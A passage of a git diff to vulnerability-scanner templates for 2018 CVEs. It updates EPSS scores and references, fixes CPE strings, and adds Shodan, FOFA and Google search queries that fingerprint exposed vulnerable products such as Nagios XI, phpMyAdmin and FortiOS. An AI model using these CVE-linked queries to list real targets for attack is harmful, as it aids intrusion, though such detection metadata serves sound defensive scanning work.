e170b2d02c..49e2dd760f 100644 --- a/http/cves/2018/CVE-2018-10141.yaml +++ b/http/cves/2018/CVE-2018-10141.yaml @@ -20,12 +20,14 @@ info: cve-id: CVE-2018-10141 cwe-id: CWE-79 epss-score: 0.00126 - epss-percentile: 0.46296 + epss-percentile: 0.47275 cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: paloaltonetworks product: pan-os + fofa-query: icon_hash="-631559155" + shodan-query: http.favicon.hash:"-631559155" tags: cve,cve2018,panos,vpn,globalprotect,xss,paloaltonetworks http: diff --git a/http/cves/2018/CVE-2018-10230.yaml b/http/cves/2018/CVE-2018-10230.yaml index feadcb357a..c97ede9e94 100644 --- a/http/cves/2018/CVE-2018-10230.yaml +++ b/http/cves/2018/CVE-2018-10230.yaml @@ -26,6 +26,7 @@ info: max-request: 1 vendor: zend product: zend_server + shodan-query: cpe:"cpe:2.3:a:zend:zend_server" tags: cve,cve2018,xss,zend http: diff --git a/http/cves/2018/CVE-2018-10562.yaml b/http/cves/2018/CVE-2018-10562.yaml index 5ddf231497..21be97774f 100644 --- a/http/cves/2018/CVE-2018-10562.yaml +++ b/http/cves/2018/CVE-2018-10562.yaml @@ -14,13 +14,14 @@ info: - https://github.com/f3d0x0/GPON/blob/master/gpon_rce.py - https://nvd.nist.gov/vuln/detail/CVE-2018-10562 - https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/ + - https://github.com/ethicalhackeragnidhra/GPON classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-10562 cwe-id: CWE-78 - epss-score: 0.97441 - epss-percentile: 0.99945 + epss-score: 0.97423 + epss-percentile: 0.99934 cpe: cpe:2.3:o:dasannetworks:gpon_router_firmware:-:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-10735.yaml b/http/cves/2018/CVE-2018-10735.yaml index 2d033c66f6..44a4f42524 100644 --- a/http/cves/2018/CVE-2018-10735.yaml +++ b/http/cves/2018/CVE-2018-10735.yaml @@ -23,8 +23,9 @@ info: vendor: nagios product: nagios_xi fofa-query: app="Nagios-XI" + shodan-query: http.title:"nagios xi" + google-query: intitle:"nagios xi" tags: cve,cve2018,nagios,sqli - variables: num: "{{rand_int(2000000000, 2100000000)}}" diff --git a/http/cves/2018/CVE-2018-10736.yaml b/http/cves/2018/CVE-2018-10736.yaml index ac3bcd34f2..54c31f2c3a 100644 --- a/http/cves/2018/CVE-2018-10736.yaml +++ b/http/cves/2018/CVE-2018-10736.yaml @@ -15,8 +15,8 @@ info: cvss-score: 7.2 cve-id: CVE-2018-10736 cwe-id: CWE-89 - epss-score: 0.00403 - epss-percentile: 0.7323 + epss-score: 0.01861 + epss-percentile: 0.88359 cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* metadata: verified: true @@ -24,8 +24,9 @@ info: vendor: nagios product: nagios_xi fofa-query: app="Nagios-XI" + shodan-query: http.title:"nagios xi" + google-query: intitle:"nagios xi" tags: cve,cve2018,nagios,sqli - variables: num: "{{rand_int(2000000000, 2100000000)}}" diff --git a/http/cves/2018/CVE-2018-10737.yaml b/http/cves/2018/CVE-2018-10737.yaml index 816ec7a586..c2fcae1645 100644 --- a/http/cves/2018/CVE-2018-10737.yaml +++ b/http/cves/2018/CVE-2018-10737.yaml @@ -23,8 +23,9 @@ info: vendor: nagios product: nagios_xi fofa-query: app="Nagios-XI" + shodan-query: http.title:"nagios xi" + google-query: intitle:"nagios xi" tags: cve,cve2018,nagios,sqli - variables: num: "{{rand_int(2000000000, 2100000000)}}" diff --git a/http/cves/2018/CVE-2018-10738.yaml b/http/cves/2018/CVE-2018-10738.yaml index 9c37617a2b..13be4d6826 100644 --- a/http/cves/2018/CVE-2018-10738.yaml +++ b/http/cves/2018/CVE-2018-10738.yaml @@ -14,8 +14,8 @@ info: cvss-score: 7.2 cve-id: CVE-2018-10738 cwe-id: CWE-89 - epss-score: 0.00403 - epss-percentile: 0.7323 + epss-score: 0.01861 + epss-percentile: 0.88359 cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* metadata: verified: true @@ -23,8 +23,9 @@ info: vendor: nagios product: nagios_xi fofa-query: app="Nagios-XI" + shodan-query: http.title:"nagios xi" + google-query: intitle:"nagios xi" tags: cve,cve2018,nagios,sqli - variables: num: "{{rand_int(2000000000, 2100000000)}}" diff --git a/http/cves/2018/CVE-2018-10823.yaml b/http/cves/2018/CVE-2018-10823.yaml index c4a9a91a38..33c77bad43 100644 --- a/http/cves/2018/CVE-2018-10823.yaml +++ b/http/cves/2018/CVE-2018-10823.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2018-10823 cwe-id: CWE-78 - epss-score: 0.96737 - epss-percentile: 0.99597 + epss-score: 0.96759 + epss-percentile: 0.9967 cpe: cpe:2.3:o:dlink:dwr-116_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-10942.yaml b/http/cves/2018/CVE-2018-10942.yaml index 9e6acac4b7..8c69a4a890 100644 --- a/http/cves/2018/CVE-2018-10942.yaml +++ b/http/cves/2018/CVE-2018-10942.yaml @@ -11,11 +11,19 @@ info: - https://www.openservis.cz/prestashop-blog/nejcastejsi-utoky-v-roce-2023-seznam-deravych-modulu-nemate-nejaky-z-nich-na-e-shopu-i-vy/ - https://nvd.nist.gov/vuln/detail/CVE-2018-10942 classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2018-10942 + cwe-id: CWE-434 + epss-score: 0.18241 + epss-percentile: 0.96178 + cpe: cpe:2.3:a:attribute_wizard_project:attribute_wizard:1.6.9:*:*:*:*:prestashop:*:* metadata: max-request: 8 + vendor: attribute_wizard_project + product: attribute_wizard + framework: prestashop tags: prestashop,attributewizardpro,intrusive,file-upload - variables: filename: '{{rand_base(7, "abc")}}' diff --git a/http/cves/2018/CVE-2018-10956.yaml b/http/cves/2018/CVE-2018-10956.yaml index a509b9736d..7b8a92335a 100644 --- a/http/cves/2018/CVE-2018-10956.yaml +++ b/http/cves/2018/CVE-2018-10956.yaml @@ -21,14 +21,16 @@ info: cvss-score: 7.5 cve-id: CVE-2018-10956 cwe-id: CWE-22 - epss-score: 0.57917 - epss-percentile: 0.97652 + epss-score: 0.54195 + epss-percentile: 0.97627 cpe: cpe:2.3:a:ipconfigure:orchid_core_vms:2.0.5:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ipconfigure product: orchid_core_vms shodan-query: http.title:"Orchid Core VMS" + fofa-query: title="orchid core vms" + google-query: intitle:"orchid core vms" tags: cve2018,cve,orchid,vms,lfi,edb,ipconfigure http: diff --git a/http/cves/2018/CVE-2018-11227.yaml b/http/cves/2018/CVE-2018-11227.yaml index dd9501ca2f..556ee22841 100644 --- a/http/cves/2018/CVE-2018-11227.yaml +++ b/http/cves/2018/CVE-2018-11227.yaml @@ -30,6 +30,7 @@ info: vendor: monstra product: monstra_cms shodan-query: http.favicon.hash:419828698 + fofa-query: icon_hash=419828698 tags: cve,cve2018,xss,mostra,mostracms,cms,edb,monstra http: diff --git a/http/cves/2018/CVE-2018-11409.yaml b/http/cves/2018/CVE-2018-11409.yaml index 2787cb03f5..27054a7f07 100644 --- a/http/cves/2018/CVE-2018-11409.yaml +++ b/http/cves/2018/CVE-2018-11409.yaml @@ -27,6 +27,9 @@ info: max-request: 2 vendor: splunk product: splunk + shodan-query: http.title:"login - splunk" + fofa-query: title="login - splunk" + google-query: intitle:"login - splunk" tags: cve,cve2018,edb,splunk http: diff --git a/http/cves/2018/CVE-2018-11473.yaml b/http/cves/2018/CVE-2018-11473.yaml index b812c09865..bffafebce3 100644 --- a/http/cves/2018/CVE-2018-11473.yaml +++ b/http/cves/2018/CVE-2018-11473.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2018-11473 cwe-id: CWE-79 - epss-score: 0.00097 - epss-percentile: 0.39534 + epss-score: 0.001 + epss-percentile: 0.4118 cpe: cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,7 @@ info: vendor: monstra product: monstra shodan-query: http.favicon.hash:419828698 + fofa-query: icon_hash=419828698 tags: cve,cve2018,xss,mostra,mostracms,cms,monstra http: diff --git a/http/cves/2018/CVE-2018-11709.yaml b/http/cves/2018/CVE-2018-11709.yaml index 5deb50899a..c2e50ddc0d 100644 --- a/http/cves/2018/CVE-2018-11709.yaml +++ b/http/cves/2018/CVE-2018-11709.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2018-11709 cwe-id: CWE-79 - epss-score: 0.00175 - epss-percentile: 0.53725 + epss-score: 0.00183 + epss-percentile: 0.55455 cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-11759.yaml b/http/cves/2018/CVE-2018-11759.yaml index 4146114bce..525db1a5fc 100644 --- a/http/cves/2018/CVE-2018-11759.yaml +++ b/http/cves/2018/CVE-2018-11759.yaml @@ -29,6 +29,8 @@ info: vendor: apache product: tomcat_jk_connector shodan-query: title:"Apache Tomcat" + fofa-query: title="apache tomcat" + google-query: intitle:"apache tomcat" tags: cve2018,cve,apache,tomcat,httpd,mod-jk http: diff --git a/http/cves/2018/CVE-2018-11776.yaml b/http/cves/2018/CVE-2018-11776.yaml index 540b9f8c3d..3d29a731da 100644 --- a/http/cves/2018/CVE-2018-11776.yaml +++ b/http/cves/2018/CVE-2018-11776.yaml @@ -22,12 +22,15 @@ info: cve-id: CVE-2018-11776 cwe-id: CWE-20 epss-score: 0.97517 - epss-percentile: 0.99985 + epss-percentile: 0.99987 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: struts + shodan-query: http.html:"apache struts" + fofa-query: body="struts problem report" + google-query: intitle:"struts2 showcase" tags: cve,cve2018,packetstorm,apache,rce,struts,kev http: diff --git a/http/cves/2018/CVE-2018-11784.yaml b/http/cves/2018/CVE-2018-11784.yaml index a39a136872..0a78bab8e9 100644 --- a/http/cves/2018/CVE-2018-11784.yaml +++ b/http/cves/2018/CVE-2018-11784.yaml @@ -21,14 +21,16 @@ info: cvss-score: 4.3 cve-id: CVE-2018-11784 cwe-id: CWE-601 - epss-score: 0.83718 - epss-percentile: 0.98183 + epss-score: 0.79069 + epss-percentile: 0.9827 cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: tomcat shodan-query: title:"Apache Tomcat" + fofa-query: body="apache tomcat" + google-query: intitle:"apache tomcat" tags: cve,cve2018,packetstorm,tomcat,redirect,apache http: diff --git a/http/cves/2018/CVE-2018-12031.yaml b/http/cves/2018/CVE-2018-12031.yaml index d054420772..44a17c7f65 100644 --- a/http/cves/2018/CVE-2018-12031.yaml +++ b/http/cves/2018/CVE-2018-12031.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-12031 cwe-id: CWE-22 - epss-score: 0.00725 - epss-percentile: 0.80248 + epss-score: 0.02759 + epss-percentile: 0.90576 cpe: cpe:2.3:a:eaton:intelligent_power_manager:1.6:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-12296.yaml b/http/cves/2018/CVE-2018-12296.yaml index 917c709de5..abb34c7602 100644 --- a/http/cves/2018/CVE-2018-12296.yaml +++ b/http/cves/2018/CVE-2018-12296.yaml @@ -25,6 +25,9 @@ info: max-request: 1 vendor: seagate product: nas_os + shodan-query: http.title:"seagate nas - seagate" + fofa-query: title="seagate nas - seagate" + google-query: intitle:"seagate nas - seagate" tags: cve,cve2018,seagate,nasos,disclosure,unauth http: diff --git a/http/cves/2018/CVE-2018-12300.yaml b/http/cves/2018/CVE-2018-12300.yaml index 94384ca163..4dc0fdc60e 100644 --- a/http/cves/2018/CVE-2018-12300.yaml +++ b/http/cves/2018/CVE-2018-12300.yaml @@ -24,6 +24,9 @@ info: max-request: 1 vendor: seagate product: nas_os + shodan-query: http.title:"seagate nas - seagate" + fofa-query: title="seagate nas - seagate" + google-query: intitle:"seagate nas - seagate" tags: cve2018,cve,redirect,seagate,nasos http: diff --git a/http/cves/2018/CVE-2018-12613.yaml b/http/cves/2018/CVE-2018-12613.yaml index 5a32b4c999..deeaed9bcc 100644 --- a/http/cves/2018/CVE-2018-12613.yaml +++ b/http/cves/2018/CVE-2018-12613.yaml @@ -20,13 +20,17 @@ info: cvss-score: 8.8 cve-id: CVE-2018-12613 cwe-id: CWE-287 - epss-score: 0.97392 - epss-percentile: 0.99908 + epss-score: 0.97369 + epss-percentile: 0.99902 cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: phpmyadmin product: phpmyadmin + shodan-query: http.title:"phpmyadmin" + fofa-query: title="phpmyadmin" + google-query: intitle:"phpmyadmin" + hunter-query: app.name="phpmyadmin"&&web.body="pma_servername"&&web.body="4.8.4" tags: cve,cve2018,vulhub,edb,phpmyadmin,lfi http: diff --git a/http/cves/2018/CVE-2018-12634.yaml b/http/cves/2018/CVE-2018-12634.yaml index d6edb3744c..0789ff6ee6 100644 --- a/http/cves/2018/CVE-2018-12634.yaml +++ b/http/cves/2018/CVE-2018-12634.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-12634 cwe-id: CWE-200 - epss-score: 0.95531 - epss-percentile: 0.99245 + epss-score: 0.94448 + epss-percentile: 0.99209 cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-12675.yaml b/http/cves/2018/CVE-2018-12675.yaml index 52e4353249..307b4d29ec 100644 --- a/http/cves/2018/CVE-2018-12675.yaml +++ b/http/cves/2018/CVE-2018-12675.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-12675 cwe-id: CWE-601 epss-score: 0.00118 - epss-percentile: 0.44971 + epss-percentile: 0.45948 cpe: cpe:2.3:o:sv3c:h.264_poe_ip_camera_firmware:v2.3.4.2103-s50-ntd-b20170508b:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-1271.yaml b/http/cves/2018/CVE-2018-1271.yaml index 0842786335..c1035c0910 100644 --- a/http/cves/2018/CVE-2018-1271.yaml +++ b/http/cves/2018/CVE-2018-1271.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-1271 cwe-id: CWE-22 epss-score: 0.004 - epss-percentile: 0.73113 + epss-percentile: 0.73504 cpe: cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-1335.yaml b/http/cves/2018/CVE-2018-1335.yaml index ec75f3047f..8921fad110 100644 --- a/http/cves/2018/CVE-2018-1335.yaml +++ b/http/cves/2018/CVE-2018-1335.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2018-1335 - epss-score: 0.96734 - epss-percentile: 0.99585 + epss-score: 0.96745 + epss-percentile: 0.99664 cpe: cpe:2.3:a:apache:tika:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-13379.yaml b/http/cves/2018/CVE-2018-13379.yaml index 0cb4384d6f..1cae4d01e3 100644 --- a/http/cves/2018/CVE-2018-13379.yaml +++ b/http/cves/2018/CVE-2018-13379.yaml @@ -27,6 +27,7 @@ info: vendor: fortinet product: fortios shodan-query: http.html:"/remote/login" "xxxxxxxx" + fofa-query: body="/remote/login" "xxxxxxxx" tags: cve2018,cve,fortios,lfi,kev,fortinet http: diff --git a/http/cves/2018/CVE-2018-13380.yaml b/http/cves/2018/CVE-2018-13380.yaml index be4ef26f42..da29fe40f3 100644 --- a/http/cves/2018/CVE-2018-13380.yaml +++ b/http/cves/2018/CVE-2018-13380.yaml @@ -21,12 +21,14 @@ info: cve-id: CVE-2018-13380 cwe-id: CWE-79 epss-score: 0.00122 - epss-percentile: 0.46406 + epss-percentile: 0.46539 cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: fortinet product: fortios + shodan-query: http.html:"/remote/login" "xxxxxxxx" + fofa-query: body="/remote/login" "xxxxxxxx" tags: cve,cve2018,fortios,xss,fortinet http: diff --git a/http/cves/2018/CVE-2018-13980.yaml b/http/cves/2018/CVE-2018-13980.yaml index cbd950e35d..df6be56a15 100644 --- a/http/cves/2018/CVE-2018-13980.yaml +++ b/http/cves/2018/CVE-2018-13980.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-13980 cwe-id: CWE-22 epss-score: 0.0018 - epss-percentile: 0.5428 + epss-percentile: 0.55107 cpe: cpe:2.3:a:zeta-producer:zeta_producer:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-14013.yaml b/http/cves/2018/CVE-2018-14013.yaml index f6a55e3a22..10802111ee 100644 --- a/http/cves/2018/CVE-2018-14013.yaml +++ b/http/cves/2018/CVE-2018-14013.yaml @@ -20,13 +20,16 @@ info: cvss-score: 6.1 cve-id: CVE-2018-14013 cwe-id: CWE-79 - epss-score: 0.00755 - epss-percentile: 0.80655 + epss-score: 0.0065 + epss-percentile: 0.7936 cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: synacor product: zimbra_collaboration_suite + shodan-query: http.title:"zimbra collaboration suite" + fofa-query: title="zimbra web client sign in" + google-query: intitle:"zimbra collaboration suite" tags: cve,cve2018,xss,zimbra,synacor http: diff --git a/http/cves/2018/CVE-2018-14474.yaml b/http/cves/2018/CVE-2018-14474.yaml index bf166bf6af..c4498e6831 100644 --- a/http/cves/2018/CVE-2018-14474.yaml +++ b/http/cves/2018/CVE-2018-14474.yaml @@ -15,13 +15,14 @@ info: - https://seclists.org/fulldisclosure/2019/Jan/32 - https://vuldb.com/?id.122045 - https://nvd.nist.gov/vuln/detail/CVE-2018-14474 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-14474 cwe-id: CWE-601 - epss-score: 0.00068 - epss-percentile: 0.28116 + epss-score: 0.00063 + epss-percentile: 0.26641 cpe: cpe:2.3:a:goodoldweb:orange_forum:1.4.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-14574.yaml b/http/cves/2018/CVE-2018-14574.yaml index 4039ad5d78..50c5926871 100644 --- a/http/cves/2018/CVE-2018-14574.yaml +++ b/http/cves/2018/CVE-2018-14574.yaml @@ -21,13 +21,14 @@ info: cvss-score: 6.1 cve-id: CVE-2018-14574 cwe-id: CWE-601 - epss-score: 0.00828 - epss-percentile: 0.80126 + epss-score: 0.00628 + epss-percentile: 0.78964 cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: djangoproject product: django + shodan-query: cpe:"cpe:2.3:a:djangoproject:django" tags: cve,cve2018,django,redirect,djangoproject http: diff --git a/http/cves/2018/CVE-2018-14912.yaml b/http/cves/2018/CVE-2018-14912.yaml index 78b9b928bb..b6d5efdc15 100644 --- a/http/cves/2018/CVE-2018-14912.yaml +++ b/http/cves/2018/CVE-2018-14912.yaml @@ -25,6 +25,9 @@ info: max-request: 1 vendor: cgit_project product: cgit + shodan-query: http.title:"git repository browser" + fofa-query: title="git repository browser" + google-query: intitle:"git repository browser" tags: cve,cve2018,cgit,lfi,cgit_project http: diff --git a/http/cves/2018/CVE-2018-14916.yaml b/http/cves/2018/CVE-2018-14916.yaml index d18230ef1a..f5bf97e49f 100644 --- a/http/cves/2018/CVE-2018-14916.yaml +++ b/http/cves/2018/CVE-2018-14916.yaml @@ -20,13 +20,13 @@ info: cvss-score: 9.1 cve-id: CVE-2018-14916 cwe-id: CWE-732 - epss-score: 0.00685 - epss-percentile: 0.79617 - cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:* + epss-score: 0.00644 + epss-percentile: 0.79217 + cpe: cpe:2.3:h:loytec:lgate-902:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: loytec - product: lgate-902_firmware + product: lgate-902 tags: cve2018,cve,loytec,lfi,packetstorm,seclists,xss http: diff --git a/http/cves/2018/CVE-2018-14918.yaml b/http/cves/2018/CVE-2018-14918.yaml index 882b57bf37..c2e66e6be1 100644 --- a/http/cves/2018/CVE-2018-14918.yaml +++ b/http/cves/2018/CVE-2018-14918.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-14918 cwe-id: CWE-22 - epss-score: 0.44897 - epss-percentile: 0.97077 + epss-score: 0.43288 + epss-percentile: 0.97355 cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: loytec product: lgate-902_firmware shodan-query: http.html:"LGATE-902" + fofa-query: body="lgate-902" tags: cve,cve2018,loytec,lfi,seclists,packetstorm,lgate,xss http: diff --git a/http/cves/2018/CVE-2018-14931.yaml b/http/cves/2018/CVE-2018-14931.yaml index 0276a7408c..7fb0af70ea 100644 --- a/http/cves/2018/CVE-2018-14931.yaml +++ b/http/cves/2018/CVE-2018-14931.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-14931 cwe-id: CWE-601 epss-score: 0.00118 - epss-percentile: 0.44971 + epss-percentile: 0.45948 cpe: cpe:2.3:a:polarisft:intellect_core_banking:9.7.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-15517.yaml b/http/cves/2018/CVE-2018-15517.yaml index 0c8c87aa62..636a38d5fe 100644 --- a/http/cves/2018/CVE-2018-15517.yaml +++ b/http/cves/2018/CVE-2018-15517.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-15517 cwe-id: CWE-918 epss-score: 0.01001 - epss-percentile: 0.83284 + epss-percentile: 0.83597 cpe: cpe:2.3:a:dlink:central_wifimanager:1.03:r0098:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-15535.yaml b/http/cves/2018/CVE-2018-15535.yaml index 792ee61d48..577811a98e 100644 --- a/http/cves/2018/CVE-2018-15535.yaml +++ b/http/cves/2018/CVE-2018-15535.yaml @@ -14,13 +14,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2018-15535 - http://seclists.org/fulldisclosure/2018/Aug/34 - https://www.exploit-db.com/exploits/45271/ + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-15535 cwe-id: CWE-22 - epss-score: 0.97149 - epss-percentile: 0.9976 + epss-score: 0.9704 + epss-percentile: 0.99756 cpe: cpe:2.3:a:tecrail:responsive_filemanager:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-15745.yaml b/http/cves/2018/CVE-2018-15745.yaml index 42be838d22..2a0195b5ec 100644 --- a/http/cves/2018/CVE-2018-15745.yaml +++ b/http/cves/2018/CVE-2018-15745.yaml @@ -21,13 +21,16 @@ info: cvss-score: 7.5 cve-id: CVE-2018-15745 cwe-id: CWE-22 - epss-score: 0.94576 - epss-percentile: 0.99184 + epss-score: 0.92562 + epss-percentile: 0.98989 cpe: cpe:2.3:a:argussurveillance:dvr:4.0.0.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: argussurveillance product: dvr + shodan-query: http.title:"web viewer for samsung dvr" + fofa-query: title="web viewer for samsung dvr" + google-query: intitle:"web viewer for samsung dvr" tags: cve,cve2018,packetstorm,edb,argussurveillance,lfi,dvr http: diff --git a/http/cves/2018/CVE-2018-15917.yaml b/http/cves/2018/CVE-2018-15917.yaml index 507df95ba1..068a749ecc 100644 --- a/http/cves/2018/CVE-2018-15917.yaml +++ b/http/cves/2018/CVE-2018-15917.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.4 cve-id: CVE-2018-15917 cwe-id: CWE-79 - epss-score: 0.04217 - epss-percentile: 0.92046 + epss-score: 0.02648 + epss-percentile: 0.90369 cpe: cpe:2.3:a:jorani_project:jorani:0.6.5:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +27,7 @@ info: vendor: jorani_project product: jorani shodan-query: title:"Login - Jorani" + fofa-query: icon_hash=-2032163853 tags: cve,cve2018,jorani,xss,jorani_project http: diff --git a/http/cves/2018/CVE-2018-15961.yaml b/http/cves/2018/CVE-2018-15961.yaml index 799a2e2293..8051dbeca7 100644 --- a/http/cves/2018/CVE-2018-15961.yaml +++ b/http/cves/2018/CVE-2018-15961.yaml @@ -20,14 +20,16 @@ info: cvss-score: 9.8 cve-id: CVE-2018-15961 cwe-id: CWE-434 - epss-score: 0.97411 - epss-percentile: 0.99921 + epss-score: 0.97436 + epss-percentile: 0.99942 cpe: cpe:2.3:a:adobe:coldfusion:11.0:-:*:*:*:*:*:* metadata: max-request: 2 vendor: adobe product: coldfusion shodan-query: http.component:"Adobe ColdFusion" + fofa-query: title="coldfusion administrator login" + google-query: intitle:"coldfusion administrator login" tags: cve,cve2018,adobe,rce,coldfusion,fileupload,kev,intrusive http: diff --git a/http/cves/2018/CVE-2018-16139.yaml b/http/cves/2018/CVE-2018-16139.yaml index bcc16fdd8f..7fc5089482 100644 --- a/http/cves/2018/CVE-2018-16139.yaml +++ b/http/cves/2018/CVE-2018-16139.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-16139 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.47838 + epss-percentile: 0.48718 cpe: cpe:2.3:a:bibliosoft:bibliopac:2008:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,8 @@ info: vendor: bibliosoft product: bibliopac shodan-query: title:"Bibliopac" + fofa-query: title="bibliopac" + google-query: intitle:"bibliopac" tags: cve,cve2018,xss,bibliopac,bibliosoft http: diff --git a/http/cves/2018/CVE-2018-16159.yaml b/http/cves/2018/CVE-2018-16159.yaml index 5880a66046..a7865f4a1b 100644 --- a/http/cves/2018/CVE-2018-16159.yaml +++ b/http/cves/2018/CVE-2018-16159.yaml @@ -29,6 +29,8 @@ info: vendor: codemenschen product: gift_vouchers framework: wordpress + fofa-query: body="/wp-content/plugins/gift-voucher/" + shodan-query: http.html:"/wp-content/plugins/gift-voucher/" tags: cve,cve2018,sqli,wordpress,unauth,wp,gift-voucher,edb,wpscan,wp-plugin,codemenschen http: diff --git a/http/cves/2018/CVE-2018-16167.yaml b/http/cves/2018/CVE-2018-16167.yaml index 29cd045b1a..48403dbf14 100644 --- a/http/cves/2018/CVE-2018-16167.yaml +++ b/http/cves/2018/CVE-2018-16167.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-16167 cwe-id: CWE-78 epss-score: 0.27457 - epss-percentile: 0.9669 + epss-percentile: 0.96794 cpe: cpe:2.3:a:jpcert:logontracer:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16283.yaml b/http/cves/2018/CVE-2018-16283.yaml index 375c7740ab..ef4e429b1a 100644 --- a/http/cves/2018/CVE-2018-16283.yaml +++ b/http/cves/2018/CVE-2018-16283.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-16283 cwe-id: CWE-22 - epss-score: 0.0412 - epss-percentile: 0.91963 + epss-score: 0.25721 + epss-percentile: 0.96702 cpe: cpe:2.3:a:wechat_brodcast_project:wechat_brodcast:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16288.yaml b/http/cves/2018/CVE-2018-16288.yaml index dcf16683bf..31b1b073df 100644 --- a/http/cves/2018/CVE-2018-16288.yaml +++ b/http/cves/2018/CVE-2018-16288.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-16288 cwe-id: CWE-200 epss-score: 0.12055 - epss-percentile: 0.95227 + epss-percentile: 0.95357 cpe: cpe:2.3:a:lg:supersign_cms:2.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16716.yaml b/http/cves/2018/CVE-2018-16716.yaml index 9ffd6e17c3..8fce44ae25 100644 --- a/http/cves/2018/CVE-2018-16716.yaml +++ b/http/cves/2018/CVE-2018-16716.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.1 cve-id: CVE-2018-16716 cwe-id: CWE-22 - epss-score: 0.00543 - epss-percentile: 0.74952 + epss-score: 0.0045 + epss-percentile: 0.75058 cpe: cpe:2.3:a:nih:ncbi_toolbox:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16761.yaml b/http/cves/2018/CVE-2018-16761.yaml index 23f9df48fa..093cbd5654 100644 --- a/http/cves/2018/CVE-2018-16761.yaml +++ b/http/cves/2018/CVE-2018-16761.yaml @@ -14,18 +14,21 @@ info: - https://www.invicti.com/web-applications-advisories/ns-18-021-open-redirection-vulnerabilities-in-eventum/ - https://github.com/eventum/eventum/releases/tag/v3.4.0 - 